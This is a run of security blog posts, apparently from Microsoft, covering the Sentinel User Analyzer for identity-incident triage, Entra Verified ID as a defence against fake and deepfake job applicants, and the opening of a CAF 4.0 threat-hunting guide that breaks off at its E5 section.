"Before the User Analyzer, when we received identity alerts we had to check a large amount of data related to users’ activity (user agents, anomalies, IP reputation, etc.). We had to write queries, wait for them to run, and then manually reason over the results. We attempted to automate some of this, but maintaining and updating that retrieval, parsing, and reasoning automation was difficult and we didn’t have the resources to support it. With the User Analyzer, we now have a plug-and-play solution that represents a step toward the AI-driven automation of the future. It gathers all the context such as what the anomalies are and presents it to our analysts so they can make quick, confident decisions, eliminating the time previously spent manually gathering this data from portals."

Solving a real problem

"For example, every 24 hours we create a low severity incident of our users who successfully sign-in to our network non interactively from outside of our GEO fence. This type of activity is not high-enough fidelity to auto-disable, requiring us to manually analyze the flagged users each time. But with User Analyzer, this analysis is performed automatically. The User Analyzer has also significantly reduced the time required to determine whether identity-based incidents like these are false positives or true positives. Instead of spending around 20 minutes investigating each incident, our analysts can now reach a conclusion in about 5 minutes using the automatically generated summary."
Looking ahead

"Looking ahead, we see even more potential. In the future, the User Analyzer could be integrated directly with Microsoft Sentinel playbooks to take automated, definitive action such as blocking user or device access based on the analyzer’s results. This would further streamline our incident response and move us closer to fully automated security operations."

Want similar benefits in your SOC? Get started with our Entity Analyzer Logic Apps template here.

User Analyzer architecture: how does it work?

Let’s take a look at how the User Analyzer works. The User Analyzer aggregates and correlates signals from multiple data sources to deliver a comprehensive analysis, enabling informed actions based on user activity. The diagram below gives an overview of this architecture:

Step 1: Retrieve Data

The analyzer starts by retrieving relevant data from the following sources:

- Sign-In Logs (Interactive & Non-Interactive): Tracks authentication and login activity.
- Security Alerts: Alerts from Microsoft Defender solutions.
- Behavior Analytics: Surfaces behavioral anomalies through advanced analytics.
- Cloud App Events: Captures activity from Microsoft Defender for Cloud Apps.
- Identity Information: Enriches user context with identity records.
- Microsoft Threat Intelligence: Enriches IP addresses with Microsoft Threat Intelligence.

Step 2: Correlate signals

Signals are correlated using identifiers such as user IDs, IP addresses, and threat intelligence. Rather than treating each alert or behavior in isolation, the User Analyzer fuses signals to build a holistic risk profile (a minimal illustrative sketch appears after Step 4).

Step 3: AI-based reasoning

In the User Analyzer, multiple AI-powered agents collaborate to evaluate the evidence and reach consensus. This architecture not only improves accuracy and reduces bias in verdicts, but also provides transparent, justifiable decisions. Leveraging AI within the User Analyzer introduces a new dimension of intelligence to threat detection. Instead of relying on static signatures or rigid regex rules, AI-based reasoning can uncover subtle anomalies that traditional detection methods and automation playbooks often miss. For example, an attacker might try to evade detection by slightly altering a user-agent string or by targeting and exfiltrating only a few files of specific types. While these changes could bypass conventional pattern matching, an AI-powered analyzer understands the semantic context and behavioral patterns behind these artifacts, allowing it to flag suspicious deviations even when the syntax looks benign.

Step 4: Verdict & analysis

Each user is given a verdict. The analyzer outputs one of the following verdicts based on the analysis:

- Compromised
- Suspicious activity found
- No evidence of compromise

Based on the verdict, a corresponding recommendation is given. This helps teams make an informed decision about whether action should be taken against the user.

*AI-generated content from the User Analyzer may be incorrect - check it for accuracy.
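To make the correlation step (Step 2) concrete, here is a minimal, illustrative Python sketch. It is not the product's implementation; the records and identifiers are hypothetical stand-ins for the sources listed in Step 1.

```python
"""Illustrative sketch of signal correlation: fuse records on shared identifiers."""
from collections import defaultdict

signins = [{"userId": "alice", "ip": "203.0.113.7", "interactive": False}]
alerts = [{"userId": "alice", "title": "Impossible travel"}]
ti_hits = {"203.0.113.7": "known malicious infrastructure"}  # threat intel by IP

def build_profiles(signins, alerts, ti_hits):
    profiles = defaultdict(lambda: {"signins": [], "alerts": [], "ti": []})
    for s in signins:
        p = profiles[s["userId"]]
        p["signins"].append(s)
        if s["ip"] in ti_hits:                      # correlate sign-in IPs with TI
            p["ti"].append((s["ip"], ti_hits[s["ip"]]))
    for a in alerts:
        profiles[a["userId"]]["alerts"].append(a)   # fuse alerts onto the same user
    return dict(profiles)

# The fused, per-user profile is what the AI reasoning stage (Step 3) evaluates.
print(build_profiles(signins, alerts, ti_hits)["alice"])
```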
User Analyzer Example Output

See the following example output from the User Analyzer within an incident comment (IP addresses have been redacted for this blog). The output surfaces MITRE ATT&CK techniques, a list of malicious IP addresses the user signed in from, and a few suspicious user agents the user's activity originated from. Analysts, who typically have to query and analyze these themselves, can feel more comfortable trusting its classification. The analyzer also gives recommendations to remediate the account compromise, and a list of data sources it used during analysis.

Conclusion

Entity Analyzer in the Microsoft Sentinel MCP server represents a leap forward in alert triage and analysis. By correlating signals and harnessing AI-based reasoning, it empowers SOC teams to act on investigations with greater speed, precision, and confidence.

*Leave feedback on the Entity Analyzer here.

Fake Employees, Real Threat: Decentralized Identity to combat Deepfake Hiring?
In recent months, cybersecurity experts have sounded the alarm on a surge of fake “employees” – job candidates who are not who they claim to be. These fraudsters use everything from fabricated CVs and stolen identities to AI-generated deepfake videos in interviews to land jobs under false pretenses. It’s a global phenomenon making headlines on LinkedIn and in the press. With the topic surfacing everywhere, I wanted to take a closer look at what’s really going on — and explore the solutions that could help organizations respond to this growing challenge. And as it happens, one solution is finally reaching maturity at exactly the right moment: decentralized identity. Let me walk you through it.

But first, let’s look at a few troubling facts:

Even tech giants aren’t immune. Amazon’s Chief Security Officer revealed that since April 2024 the company has blocked over 1,800 suspected North Korean scammers from getting hired, and that the volume of such fake applicants jumped 27% each quarter this year (1.1). In fact, a coordinated scheme involving North Korean IT operatives posing as remote workers has infiltrated over 300 U.S. companies since 2020, generating at least $6.8 million in revenue for the regime (2.1). CrowdStrike also reported more than 320 confirmed incidents in the past year alone, marking a 220% surge in activity (2.2). And it’s not just North Korea: organised crime groups globally are adopting similar tactics.

This trend is not a small blip; it’s likely a sign of things to come. Gartner predicts that by 2028, one in four job applicant profiles could be fake in some way (3). Think about that – in a few years, 25% of the people applying to your jobs might be bots or impostors trying to trick their way in. We’re not just talking about exaggerated resumes; we’re talking about full-scale deception: people hiring stand-ins for interviews, AI bots filling out assessments, and deepfake avatars smiling through video calls. It’s a hiring manager’s nightmare — no one wants to waste time interviewing bots or deepfakes — and a CISO’s worst-case scenario rolled into one.

The Rise of the Deepfake Employee

What does a “fake employee” actually do? In many cases, these impostors are part of organized schemes (even state-sponsored) to steal money or data. They might forge impressive résumés and create a minimal but believable online presence. During remote interviews, some have been caught using deepfake video filters – basically digital masks – to appear as someone else. In one case, Amazon investigators noticed an interviewee’s typing did not sync with the on-screen video (the keystrokes had a 110ms lag); it turned out to be a North Korean hacker remotely controlling a fake persona on the video call (1.2). Others refuse video entirely, claiming technical issues, so you only hear a voice. Some even hire proxy interviewees – a real person who interviews in their place. The level of creativity is frightening.

Once inside, a fake employee can do serious damage. They gain legitimate access to internal systems, data, and tools. Some have stolen sensitive source code and threatened to leak it unless the company paid a ransom (1). Others quietly set up backdoor access for future cyberattacks. And as noted, if they’re part of a nation-state operation, the salary you pay them is funding adversaries. The U.S. Department of Justice recently warned that many North Korean IT workers send the majority of their pay back to the regime’s illicit weapons programs (1)(2.3).
Beyond the financial angle, think of the security breach: a malicious actor is now an “insider” with an access badge.

No sector is safe. While tech companies with lots of remote jobs were the first targets, the scam has expanded. According to the World Economic Forum, about half of the companies targeted by these attacks aren’t in the tech industry at all (4). Financial services, healthcare, media, energy – any business that hires remote freelancers or IT staff could be at risk. Many Fortune 500 firms have quietly admitted to Charles Carmakal (Chief Technology Officer at Google Cloud’s Mandiant) that they’ve encountered fake candidates (2.3). Brandon Wales — former Executive Director of the Cybersecurity and Infrastructure Security Agency (CISA) and now VP of Cybersecurity Strategy at SentinelOne — warned that the “scale and speed” of these operations is unlike anything seen before (2.3). Rivka Little, Chief Growth Officer at Socure, put it bluntly: “Every Fortune 100 and potentially Fortune 500 has a pretty high number of risky employees on their books” right now (1).

If you’re in charge of security or IT, this should send a chill down your spine. How do you defend against an attack that walks in through your front door (virtually) with HR’s approval? It calls for rethinking some fundamental practices, which leads us to the biggest gap these scams have exposed: identity verification in the hiring process.

The Identity Verification Gap in Hiring

Let’s face it: traditional hiring and onboarding operate on a lot of trust. You collect a résumé, maybe call some references, do a background check that might catch a criminal record but won’t catch a well-crafted fake identity. You might ask for a copy of a driver’s license or passport to satisfy HR paperwork, but how thoroughly is it checked? And once the person is hired and given an employee account, how often do we re-confirm that person’s identity in the months or years that follow? Almost never.

Now let’s look at the situation from the reverse perspective: during your last recruitment, or when you became a new vendor for a client, were you asked to send over a full copy of your ID via email? Most likely, yes. You send a scan of your passport or ID card to an HR representative or a partner’s portal, and you have no idea where that image gets stored, who can see it, or how long it will sit around. It feels uncomfortable, but we do it because we need to prove who we are. In reality, we’re making a leap of faith that the process is secure.

This is the identity verification gap. Companies are trusting documents and self-assertions that can be forged, and they rarely have a way to verify those beyond a cursory glance. Fraudsters exploit this gap mercilessly. They provide fake documents that look real, or steal someone else’s identity details to pass background checks. Once they’ve cleared that initial hurdle, the organization treats them as legit. IT sets up accounts, security gives them access, and from then on the “user identity” is assumed to be genuine. Forever.

Moreover, once an employee is on board, internal processes often default to trust. Need a password reset? The helpdesk might ask for your birthdate or employee ID – pieces of info a savvy attacker can learn or steal. We don’t usually ask an employee who calls IT to re-prove that they are the same person HR hired months or years ago. All of this stands in contrast to the principle of Zero Trust security that many companies are now adopting.
Coined by John Kindervag (Forrester, 2009), Zero Trust says “never trust, always verify” for each access request. But how can you verify if the underlying identity was fake to start with? As part of Microsoft, we often say that “identity is the new perimeter” – meaning the primary defense line is verifying identities, not just securing network walls. If that identity perimeter is built on shaky ground (unverified people), the whole security model is weak.

So, what can be done? Security leaders and even the World Economic Forum are advocating for stronger identity proofing in hiring. The WEF specifically recommends “verifiable government ID checks at multiple stages of recruitment and into employment” (4). In other words, don’t just verify once and forget it – verify early, verify often. That might mean an ID and background check when offering the job, another verification during onboarding, and perhaps periodic re-checks or at least checks on certain events (like when the employee requests elevated privileges). Amazon’s CSO, S. Schmidt, echoed this after battling North Korean fakes; he advised companies to “Implement identity verification at multiple hiring stages and monitor for anomalous technical behavior” as a key defense (1).

Of course, doing this manually is tough. You can’t very well ask each candidate to fly in their first day just to show their passport in person, especially with global and remote workforces. That’s where technology is stepping up. Enter the world of Verified ID and decentralized identity.

Enter Microsoft Entra Verified ID: proving Identity, not just Checking a Box

Imagine if, instead of emailing copies of your passport to every new employer or partner, you could carry a digital identity credential that is already verified and can be trusted by others instantly. That’s the idea behind Microsoft Entra Verified ID. It’s essentially a system for issuing and verifying cryptographically secure digital identity credentials. Let’s break down what that means in plain terms.

At its core, a Verified ID credential is like a digital ID card that lives in an app on your phone. But unlike a photocopy of your driver’s license (which anyone could copy, steal or tamper with), this digital credential is signed with cryptographic keys that make it tamper-proof and verifiable. It’s based on open standards: Microsoft has been heavily involved in the development of Decentralized Identifiers (DIDs) and W3C Verifiable Credentials standards over the past few years (7). The benefit of standards is that this isn’t a proprietary Microsoft-only thing – it’s part of a broader move toward decentralized identity, where the user is in control of their own credentials.

Here’s a real-life analogy: when you go to a bar and need to prove you’re over 18, you show your driver’s license, national ID or passport. The bouncer checks your birth date and maybe the hologram, but they don’t photocopy your entire ID and keep it; they just verify it and hand it back. You remain in possession of your ID. Now translate that to digital interactions: with Verified ID, you could have a credential on your phone that says “Government ID verified: [Your Name], age 25”. When a verifier (like an employer or service) needs proof, you share that credential through a secure app. The verifier’s system checks the credential’s digital signature to confirm it was issued by a trusted authority (for example, a background check company or a government agency) and that it hasn’t been altered.
You don’t have to send over a scan of your actual passport or reveal extra info like your full birthdate or address – the credential can be designed to reveal only the necessary facts (e.g. “is over 18” = yes). This concept is called selective disclosure, and it’s a big win for privacy. (A minimal sketch of what such a credential looks like appears below.)

Crucially, you decide which credentials to share and with whom. You might have one that proves your legal name and age (from a government issuer), another that proves your employment status (from your employer), another that proves a certification or degree (from a university). And you only share them when needed. They can also have expiration dates or be revoked. For instance, an employment credential could automatically expire when you leave the company. This means if someone tries to use an old credential, it would fail verification – another useful security feature.

Now, how do these credentials get issued in the first place? This is where the integration with our Microsoft partner IDEMIA comes in, which was a highlight of Microsoft Ignite 2025. IDEMIA is a company you might not have heard of, but they’re a huge player in the identity world – they’re the folks behind many government ID and biometric systems (think passport chips, national ID programs, biometric border control, etc.). Microsoft announced that Entra Verified ID now integrates IDEMIA’s identity verification services. In practice, this means when you need a high-assurance credential (like proving your real identity for a job), the system can invoke IDEMIA to do a thorough check.

For example, as part of a remote onboarding process, an employer using Verified ID could ask the new hire to verify their identity through IDEMIA. The new hire gets a link or prompt, and is guided to scan their official government ID and take a live selfie video. IDEMIA’s system checks that the ID is authentic (not a forgery) and matches the person’s face, doing so in a privacy-protecting way (for instance, biometric data might be used momentarily to match and then not stored long-term, depending on the service policies). This process confirms “Yes, this is Alice, and we’ve confirmed her identity with a passport and live face check.”

At that point, Microsoft Entra Verified ID can issue a credential to Alice, such as “Alice – identity verified by Contoso Corp on [Date]”. Alice stores this credential in her digital wallet (for instance, the Microsoft Authenticator app). Now Alice can present that credential to apps or IT systems to prove it’s really Alice. The employer might require it to activate her accounts, or later, if Alice calls IT support, they might ask her to present the credential to prove her identity for a password reset. The verification of the credential is cryptographically secure and instantaneous – the IT system just checks the digital signature. There’s no need to manually pull up Alice’s passport scan from HR files or interrogate her with personal questions. Plus, Alice isn’t repeatedly sending sensitive personal documents; she shared them once with a trusted verifier (IDEMIA via the Verified ID app flow), not with every individual who asks for ID. This reduces the exposure of her personal data.

From the company’s perspective, this approach dramatically improves security and streamlines processes. During onboarding, it’s actually faster to have someone go through an automated ID verification flow than to coordinate an in-person verification or trust slow manual checks. Organizations also avoid collecting and storing piles of personal documents, which is a compliance headache and a breach risk. Instead, they get a cryptographic assurance. Think of it like the difference between keeping copies of everyone’s credit card versus using a payment token – the latter is safer and just as effective for the transaction.
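To ground the idea, here is a minimal sketch of a W3C Verifiable Credential, shown as a Python dictionary. Every value is a hypothetical placeholder; a real Entra Verified ID credential carries issuer-specific claims and a cryptographic proof produced at issuance.

```python
# Illustrative only: the general shape of a W3C Verifiable Credential.
# All identifiers and claim names below are hypothetical examples.
verified_employee_credential = {
    "@context": ["https://www.w3.org/2018/credentials/v1"],
    "type": ["VerifiableCredential", "VerifiedEmployee"],
    "issuer": "did:web:verifiedid.contoso.com",        # the issuer's DID
    "issuanceDate": "2025-11-18T00:00:00Z",
    "expirationDate": "2026-11-18T00:00:00Z",          # can expire or be revoked
    "credentialSubject": {
        "id": "did:example:holder123",                 # the holder's DID
        "displayName": "Alice Example",
        "isOver18": True,                              # selective disclosure: only this fact
    },
    # "proof": {...}  # signature a verifier checks against the issuer's DID document
}
```

The verifier never needs the underlying passport scan; it checks the proof, the issuer, and the expiration, and trusts only the specific facts disclosed.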
Organizations also avoid collecting and storing piles of personal documents, which is a compliance headache and a breach risk. Instead, they get a cryptographic assurance. Think of it like the difference between keeping copies of everyone's credit card and using a payment token: the latter is safer and just as effective for the transaction.

Microsoft has been laying the groundwork for this for years. Back in 2020 (and even as far back as 2017), Microsoft was discussing decentralized identity concepts where users own their identity data and apps verify facts about you through digital attestations (7). Now it's reality: Entra Verified ID uses those open standards (DIDs and Verifiable Credentials) under the hood. And the integration with IDEMIA and others means it's not just theoretical; it's operational and scalable. As Ankur Patel, one of our product leaders for Microsoft Entra, said about these integrations: it enables "high assurance verification without custom business contracts or technical implementations" (6). In other words, companies can now plug this capability in easily, rather than building their own verification processes from scratch.

Before moving on, here is the promised quote from IDEMIA's executive that really underscores the value:

"With more than 40 years of experience in identity issuance, verification and advanced biometrics, our collaboration with Microsoft enables secure authentication with verified identities organizations can rely on to ensure individuals are who they claim to be and critical services can be accessed seamlessly and securely." – Amit Sharma, Head of Digital Strategy, IDEMIA (6)

That quote says it all: verified identities that organizations can rely on, enabling seamless and secure access. Now, let's see how that translates into real-world usage.

Use Cases and Benefits: From Onboarding to Recovery

How can Verified ID (together with IDEMIA's verification services) be applied in day-to-day business? There are several high-impact use cases:

Remote Employee Onboarding (aka Hire with Confidence): This is the most straightforward scenario. When bringing in a new hire you haven't met in person, you can integrate an identity verification step. As described earlier, the new employee verifies their government ID and face once, gets a credential, and uses it to start work. The hiring team can trust that this person is real and is who they say they are. This directly prevents many fake-employee scams. In fact, some companies have already tried informal versions of it: The Register reported the story of an identity verification company (ironically) that, after seeing suspicious candidates, told one applicant "next interview we'll do a document verification, it's easy, we'll send you a barcode to scan your ID", and that candidate never showed up for the next round because they knew they'd be caught (1). With Verified ID, this becomes a standard, automated part of the process, not an ad-hoc test. As a bonus, the employee's Verified ID credential can also speed up IT onboarding (auto-provisioning accounts when the verified credential is presented) and even simplify things like proving work authorization to other services (think of how often you have to send copies of IDs to benefits providers or background screeners; a credential could replace that). The new hire starts faster, and with less anxiety, because they know there's strong proof attached to their identity, and the company carries less risk from day one.
Oh, and HR isn't stuck babysitting sensitive documents, so governance and privacy risk go down.

Stronger Helpdesk and Support Authentication: Helpdesk fraud is a common way attackers exploit weak verification. Instead of asking employees for their first pet's name or a short code (which an attacker might phish), support can use Verified ID to confirm the person's identity. For example, if someone calls IT saying "I'm locked out of my account," the support portal can send a push notification asking the user to present their Verified Employee credential or do a quick re-verification via the app. If the person on the phone is an impostor, they'll fail this check. If it's the real employee, it's an easy tap on their phone to prove it's them. This approach secures processes like password resets, unlocking accounts, and granting temporary access. Think of it as caller ID on steroids: instead of taking someone's word that "I am Alice from Finance," the system actually asks for proof. And because the proof is cryptographically verified, it's much harder to trick than a human support agent confronted with a sob story. It reduces the burden on support too: less time playing detective with personal questions, more confidence to automate certain requests.

Account Recovery and On-Demand Re-Verification: We've all dealt with the hassle of account recovery after losing a password or device. It's often a weak link: backup codes, personal Q&A, a support team asking some manager who can't even tell whether it's really you, or requests for a copy of your ID. With Verified ID, organizations can offer secure self-service recovery that doesn't rely on shared secrets. For instance, if you lose access to your multi-factor authentication and need to regain entry, you could be prompted to verify your identity with a government ID check through the Verified ID system. Once you pass, you might be allowed to reset your authentication methods. Microsoft is already moving in this direction; there's talk of replacing security questions with Verified ID checks for Entra ID account recovery (6). The benefit is high assurance that the person recovering the account is its legitimate owner, which is especially important for administrators and other highly privileged users. And it's still faster for the user than, say, waiting days for IT to manually vet and approve a request. Additionally, companies could set policies so that employees engaged in sensitive work are periodically prompted to reaffirm their identity. That keeps everyone honest and catches anomalies: imagine an attacker who has somehow compromised an account and is suddenly faced with an unexpected ID check they cannot pass, raising an immediate red flag. (Recovery flows are also worth watching closely in the meantime; see the sketch after this list.)

Step-Up Authentication for Sensitive Actions: Not every action an employee takes needs this level of verification, but some absolutely do. For example, a finance officer making a $10 million wire transfer, an engineer pushing code to a production environment, or an HR admin downloading an entire employee database could all trigger a step-up authentication that includes verifying the user's identity credential. In practice, the user might see a pop-up saying "Please present your Verified ID to continue." Depending on the sensitivity, it might even ask for a fresh selfie, which can be matched against the one on file (using Face Match in a privacy-conscious way). This is like saying: "We know you logged in with your password and MFA earlier, but this action is so critical that we want to double-check you are still the one executing it, not someone who stole your session or is using your computer." It's analogous to how some banks send a one-time code for high-value transactions, except that instead of just a code (which could be stolen), it's verifying you. This dramatically reduces the risk of insider threats and account takeovers causing catastrophic damage. For the user, it's usually a simple extra step whose importance they'll understand, especially in high-stakes fields. It also builds trust in both directions: the company grants access, and the employee is protected against being impersonated.
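Until credential-based checks are wired into every one of these flows, it is worth at least watching them. Here is a minimal sketch of a review query over Microsoft Sentinel's AuditLogs table (the standard table for Entra ID audit events); the operation names listed are common Entra ID audit activities, but treat them as assumptions and confirm them against your own tenant's data.

```kusto
// Illustrative review: credential resets and security-info changes over two
// weeks, grouped per target user per day. Operation names vary by tenant and
// logging configuration; verify them before relying on this.
AuditLogs
| where TimeGenerated > ago(14d)
| where OperationName in ("Reset user password",
                          "User registered security info",
                          "Admin registered security info")
| extend Actor  = tostring(InitiatedBy.user.userPrincipalName),
         Target = tostring(TargetResources[0].userPrincipalName)
| summarize Events = count(), Operations = make_set(OperationName)
            by Target, Actor, bin(TimeGenerated, 1d)
| order by Events desc
```

Spikes in resets for a single account, or resets initiated outside business hours, are exactly the anomalies an unexpected Verified ID re-check would stop cold.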
In all these cases, Verified ID adds security without a huge usability cost. In fact, many users might prefer it to the status quo: I'd rather verify my identity once, properly, than answer a bunch of security questions or have an IT person eyeballing my ID over a grainy video call. It also introduces transparency and control. As an employee, if I'm using a Verified ID, I know exactly what credential I'm sharing and why, and I have a log of it. It's not an opaque process where I send documents into a void.

From a governance perspective, using Verified ID means less personal data spread around to protect, and a clearer audit trail of "this action was taken by Alice, whose identity was verified by method X at time Y." It can even help with regulatory compliance, for instance by proving that you really know who has access to sensitive financial data (important for SOX compliance and other audits).

And circling back to the theme of fake employees: if such a system is in place, it's a massive deterrent. The barrier to entry for fraudsters becomes much higher. It's not impossible to beat (nothing is, and you still need to assume breach), but now attackers would have to fool top-tier document verification and biometric checks, not just an overworked recruiter. That likely requires physical presence and high-quality fake documents, which are riskier and more costly for attackers. The more companies adopt such measures, the less return on investment these hiring scams offer cybercriminals.

The Bigger Picture: Verified Identity as the New Security Frontier

The convergence of trends here is interesting. On one hand, digital transformation and remote work opened the door to these novel attacks. On the other, new security philosophies like Zero Trust emphasize continuous verification of identity and context. Verified ID is essentially Zero Trust applied to hiring and identity: never trust an identity claim, always verify it. What's exciting is that this can now be done without turning the enterprise into a surveillance state or creating unbearable friction for legitimate users. It leverages cryptography and user-centric design to raise security while preserving privacy.

Microsoft's involvement in decentralized identity and the integration of partners like IDEMIA signal that this approach is maturing. It's moving from pilot projects to being built into mainstream products (Entra ID, Microsoft 365, and even LinkedIn, which now offers verification badges via Entra Verified ID (5)). LinkedIn's angle is worth noting: job seekers can verify where they work, or their government ID, on their LinkedIn profile, which could also help employers spot fakes (though it's voluntary and early-stage).
For CISOs and identity architects, Verified ID offers a concrete tool for what was previously a very squishy problem. Instead of crossing your fingers and hoping employees are who they say they are, you can enforce it. It's analogous to the evolution of payments security: we moved from signatures (which were rarely checked) to PIN codes and chips, and now to contactless cryptographic payments. Hiring and access management can undergo a similar upgrade, from assumption-based to verification-based.

Of course, adopting Verified ID, or any new identity technology, requires planning. Organizations will need to update their onboarding processes, train HR and IT staff on the new procedures, and ensure employees are comfortable with them. Privacy considerations must be addressed (for example, clarifying that biometric data used for verification isn't stored indefinitely). But compared to the alternative (doing nothing and hoping not to be the next company in a scathing news headline about North Korean fake workers), the effort is worthwhile.

In summary, human identity has become the new primary perimeter for cybersecurity. We can build all the firewalls and endpoint protections we want, but if a malicious actor can legitimately log in through the front door as an employee, those defenses may not matter. Verified identity solutions like Microsoft Entra Verified ID (with partners like IDEMIA) provide a way to fortify that perimeter with strong, real-time checks. They bring trust back into remote interactions by shifting from "trust by default" to "trust because verified."

This is not a theoretical future; it's happening now. As of late 2025, these tools are generally available and being rolled out in enterprises. Early adopters will likely be those in highly targeted sectors or under regulatory pressure: think defense contractors, financial institutions, and tech companies burned by experience. But I suspect it will trickle into standard best practice over the next few years, much as multi-factor authentication did. The fight against fake employees and deepfake hiring scams will continue, and attackers will evolve new tricks (perhaps trying to fake the verifications themselves). But having this layer in place tilts the balance back in favor of the defenders. It forces attackers to take more risks and expend more resources, which in turn dissuades many from even trying.

To end on a practical note: if you're a security decision-maker, now is a good time to evaluate your organization's hiring and identity verification practices. Conduct a risk assessment: do you have any way to truly verify a new remote hire's identity? How confident are you that all your current employees are real? If those questions make you uncomfortable, it's worth looking into solutions like Verified ID. We're entering an era where digital identity proofing will be as standard as background checks in HR processes. The technology has caught up to the threat, and embracing it could save your company from a very costly lesson learned. Remember: trust is good, but verified trust is better. By making identity verification a seamless part of the employee lifecycle, we can help ensure that the only people on the payroll are the ones we intended to hire. In a world of sophisticated fakes, that confidence is priceless.

Sources:

(1.1) The Register – "Amazon blocked 1,800 suspected North Korean scammers seeking jobs" (Dec 18, 2025) – S. Schmidt comments on DPRK fake workers and advises multi-stage identity verification.
https://www.theregister.com/2025/12/18/amazon_blocked_fake_dprk_workers ("We believe, at this point, every Fortune 100 and potentially Fortune 500 has a pretty high number of risky employees on their books" – Socure Chief Growth Officer Rivka Little) and https://www.linkedin.com/posts/stephenschmidt1_over-the-past-few-years-north-korean-dprk-activity-7407485036142276610-dot7 ("Implement identity verification at multiple hiring stages and monitor for anomalous technical behavior" – Amazon's CSO, S. Schmidt)

(1.2) Heal Security – "Amazon Catches North Korean IT Worker by Tracking Tiny 110ms Keystroke Delays" (Dec 19, 2025). https://healsecurity.com/amazon-catches-north-korean-it-worker-by-tracking-tiny-110ms-keystroke-delays/

(2.1) U.S. Department of Justice – "Charges and Seizures Brought in Fraud Scheme Aimed at Denying Revenue for Workers Associated with North Korea" (May 16, 2024). https://www.justice.gov/usao-dc/pr/charges-and-seizures-brought-fraud-scheme-aimed-denying-revenue-workers-associated-north

(2.2) PCMag – "Remote Scammers Infiltrate 300+ Companies" (Aug 4, 2025). https://www.pcmag.com/news/is-your-coworker-a-north-korean-remote-scammers-infiltrate-300-plus-companies

(2.3) POLITICO – "Tech companies have a big remote worker problem: North Korean operatives" (May 12, 2025). https://www.politico.com/news/2025/05/12/north-korea-remote-workers-us-tech-companies-00340208 ("I've talked to a lot of CISOs at Fortune 500 companies, and nearly every one that I've spoken to about the North Korean IT worker problem has admitted they've hired at least one North Korean IT worker, if not a dozen or a few dozen" – Charles Carmakal, Chief Technology Officer at Google Cloud's Mandiant) and "North Koreans posing as remote IT workers infiltrated 136 U.S. companies" (Nov 14, 2025). https://www.politico.com/news/2025/11/14/north-korean-remote-work-it-scam-00652866

(3) HR Dive – "By 2028, 1 in 4 candidate profiles will be fake, Gartner predicts" (Aug 8, 2025) – Gartner research highlighting rising candidate fraud and the 25% fake-profile forecast. https://www.hrdive.com/news/fake-job-candidates-ai/757126/

(4) World Economic Forum – "Unmasking the AI-powered, remote IT worker scams threatening businesses" (Dec 15, 2025) – Overview of deepfake hiring threats; recommends government ID checks at multiple hiring stages. https://www.weforum.org/stories/2025/12/unmasking-ai-powered-remote-it-worker-scams-threatening-businesses-worldwide/

(5) The Verge – "LinkedIn gets a free verified badge that lets you prove where you work" (Apr 2023) – Describes LinkedIn's integration with Microsoft Entra for profile verification. https://www.theverge.com/2023/4/12/23679998/linkedin-verification-badge-system-clear-microsoft-entra

(6) Microsoft Tech Community – "Building defense in depth: Simplifying identity security with new partner integrations" (Nov 24, 2025, by P. Nrisimha) – Microsoft Entra blog announcing Verified ID GA, including the IDEMIA integration and quotes (Amit Sharma, Ankur Patel).
https://techcommunity.microsoft.com/t5/microsoft-entra-blog/building-defense-in-depth-simplifying-identity-security-with-new/ba-p/4468733 and https://www.linkedin.com/posts/idemia-public-security_synced-passkeys-and-high-assurance-account-activity-7407061181879709696-SMi7 and https://www.linkedin.com/posts/4ankurpatel_synced-passkeys-and-high-assurance-account-activity-7406757097578799105-uFZz ("high assurance verification without custom business contracts or technical implementations" – Ankur Patel)

(7) Microsoft Entra Blog – "Building trust into digital experiences with decentralized identities" (June 10, 2020, by A. Simons & A. Patel) – Background on Microsoft's approach to decentralized identity (DIDs, Verifiable Credentials). https://techcommunity.microsoft.com/t5/microsoft-entra-blog/building-trust-into-digital-experiences-with-decentralized/ba-p/1257362 – "Decentralized digital identities and blockchain: The future as we see it". https://www.microsoft.com/en-us/microsoft-365/blog/2018/02/12/decentralized-digital-identities-and-blockchain-the-future-as-we-see-it/ – "Partnering for a path to digital identity" (Jan 22, 2018). https://blogs.microsoft.com/blog/2018/01/22/partnering-for-a-path-to-digital-identity/

About the Author

I'm Samuel Gaston-Raoul, Partner Solution Architect at Microsoft, working across the EMEA region with the diverse ecosystem of Microsoft partners, including System Integrators (SIs) and strategic advisory firms, Independent Software Vendors (ISVs) / Software Development Companies (SDCs), and Startups. I engage with our partners to build, scale, and innovate securely on the Microsoft Cloud and Microsoft Security platforms. With a strong focus on cloud and cybersecurity, I help shape strategic offerings and guide the development of security practices, ensuring alignment with market needs, emerging challenges, and Microsoft's product roadmap. I also engage closely with our product and engineering teams to foster early technical dialogue and drive innovation through collaborative design. Whether through architecture workshops, technical enablement, or public speaking engagements, I aim to evangelize Microsoft's security vision while co-creating solutions that meet the evolving demands of the AI and cybersecurity era.

Security Guidance Series: CAF 4.0 Threat Hunting From Detection to Anticipation
The CAF 4.0 update reframes C2 (Threat Hunting) as a cornerstone of proactive cyber resilience. According to the NCSC CAF 4.0, this principle is no longer about occasional investigations or manual log reviews; it now demands structured, frequent, intelligence-led threat hunting that evolves in line with organizational risk. The expectation is that UK public sector organizations will not just respond to alerts but will actively search for hidden or emerging threats that evade standard detection technologies, documenting their findings and using them to strengthen controls and response.

In practice, this represents a shift from detection to anticipation. Threat hunting under CAF 4.0 should be hypothesis-driven, focusing on attacker tactics, techniques, and procedures (TTPs) rather than isolated indicators of compromise (IoCs). Organizations must build confidence that their hunting processes are repeatable, measurable, and continuously improving, leveraging automation and threat intelligence to expand coverage and consistency.

Microsoft E3

Microsoft E3 equips organizations with the baseline capabilities to begin threat investigation, forming the starting point for Partially Achieved maturity under CAF 4.0 C2. At this level, hunting is ad hoc and event-driven, but it establishes the foundation for structured processes.

How E3 contributes to the C2 objectives:

Reactive detection for initial hunts: Defender for Endpoint Plan 1 surfaces alerts on phishing, malware, and suspicious endpoint activity. Analysts can use these alerts to triage incidents and document the steps taken, creating the first iteration of a hunting methodology.

Identity correlation and manual investigation: Entra ID P1 provides Conditional Access and MFA enforcement, while audit telemetry in the Security & Compliance Centre supports manual reviews of identity anomalies. These capabilities allow organizations to link endpoint and identity signals during investigations.

Learning from incidents: By recording findings from reactive hunts and feeding lessons into risk decisions, organizations begin to build repeatable processes, even if hunts are not yet hypothesis-driven or frequent enough to match risk.

What's missing for Achieved: Under E3, hunts remain reactive, lack documented hypotheses, and do not routinely convert findings into automated detections. Achieving full maturity typically requires regular, TTP-focused hunts, automation, and integration with advanced analytics: capabilities found in higher-tier solutions.

Microsoft E5

